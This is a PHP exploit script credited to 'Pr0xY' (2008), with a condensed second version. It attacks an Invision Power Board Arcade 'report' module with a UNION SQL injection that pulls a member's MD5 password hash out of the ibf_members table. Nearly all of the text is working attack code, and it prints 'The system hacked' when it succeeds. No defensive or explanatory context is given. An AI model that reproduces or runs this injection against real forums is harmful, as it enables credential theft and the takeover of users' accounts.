<pre>
<?php
 
 /**
  * @author Pr0xY
  * @copyright 2008
  */
 
 class Injection
 {
    var $inject;
    var $Asite;
    var $Isite;
    
   function Injection($address, $id)
   {
      $this->inject = "index.php?act=Arcade&module=report&user=-{$id}%20union%20select%20password%20from%20ibf_members%20where%20id={$id}";
      $this->Asite  = $address;
   }
   
   function getTheHash()
   {
      $html = file_get_contents($this->Asite.$this->inject);
      preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);
      
      $md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
      $md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);
      
      if(strlen($md5) == 32)
         echo "The system hacked : <b>{$md5}</b>";
      else
         echo "Error";
   }
   
 }
 
 $y0n1 = new Injection("", 1);
 $y0n1->getTheHash();
 
?>
</pre>
 
The short code :
 
$a = "";
$i = 1;
 
$inject = "index.php?act=Arcade&module=report&user=-{$i}%20union%20select%20password%20from%20ibf_members%20where%20id={$i}";
 
$html = file_get_contents($a.$inject);
      preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);
 
$md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
$md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);
 
echo $md5;